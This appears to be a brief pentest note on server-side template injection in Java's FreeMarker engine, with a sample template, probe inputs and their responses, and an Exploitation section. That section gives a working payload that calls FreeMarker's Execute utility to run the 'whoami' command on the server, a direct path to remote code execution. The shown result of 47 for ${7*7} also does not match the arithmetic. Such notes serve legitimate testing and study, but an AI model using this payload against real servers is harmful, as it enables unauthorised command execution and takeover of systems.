Discovery
The server will run Java in the back-end.
Freemarker code example:
<!DOCTYPE html>
<html>
<head>
<title>Hello FreeMarker Example</title>
</head>
<body>
<h1>Hello, ${name}!</h1>
</body>
</html>
Input
${7*7}
47
${7*'7'}
There was an error rendering your content
Exploitation
${"freemarker.template.utility.Execute"?new()("whoami")}